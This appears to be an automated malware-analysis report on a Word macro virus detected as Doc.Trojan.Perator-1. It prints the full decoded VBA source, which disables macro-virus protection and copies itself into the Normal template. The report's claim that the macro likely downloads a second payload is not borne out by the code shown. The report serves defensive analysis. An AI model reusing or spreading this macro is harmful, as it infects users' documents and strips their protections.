Malware Insights
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to display a fake document summary dialog with the title 'bHAK 31337 oPERATOR/rUNE wAS hERE' and includes the URL 'http://lz0vx.cjb.net' in its keywords. This suggests the macro's purpose is to lure the user into enabling malicious content, likely to download and execute a secondary payload. The ClamAV detection as 'Doc.Trojan.Perator-1' further supports its malicious nature.
Heuristics (4)
- ClamAV: Doc.Trojan.Perator-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Perator-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://lz0vx.cjb.net: in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3331 bytes |

SHA-256: aa2858fd5ed8e92647ce213add9e968375ce44b99b0d56c0924cd006c9cb39f1

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Private Sub Document_Open()
On Error Resume Next: Set egger = MacroContainer: tappler = 2
With Dialogs(wdDialogFileSummaryInfo): .Title = "bHAK 31337 oPERATOR/rUNE wAS hERE": .Author = "oPERATOR": .Keywords = "http://lz0vx.cjb.net": .Execute: End With
SetAttr NormalTemplate.FullName, vbNormal: Options.SaveNormalPrompt = (Rnd * 0)
Set walchensteiner = egger.VBProject: Options.VirusProtection = (Rnd * 0)
Set laggner = walchensteiner.vbcomponents((tappler - 1)): Set gaggl = laggner.codemodule
Set straubinger = NormalTemplate: bachler = gaggl.lines((tappler - 1), gaggl.countoflines)
If egger = straubinger Then Set straubinger = ActiveDocument
Set thalhammer = straubinger.VBProject.vbcomponents((tappler - 1)).codemodule
If Right(thalhammer.lines((tappler * 26), (tappler - 1)), 27) <> "'bHAK 31337 - oPERATOR/rUNE" Then
thalhammer.deletelines 1, thalhammer.countoflines
thalhammer.addfromstring bachler
If ActiveDocument.Saved = False Then ActiveDocument.SaveAs ActiveDocument.FullName
End If
If Day(Now()) = (tappler * (Int(Rnd * 15))) Then
MsgBox "bLEED°rAKAtAKA", 0, "BHAK 31337"
While ShowCursor(False) >= 0
Wend
End If
End Sub
'bHAK 31337 - oPERATOR/rUNE
```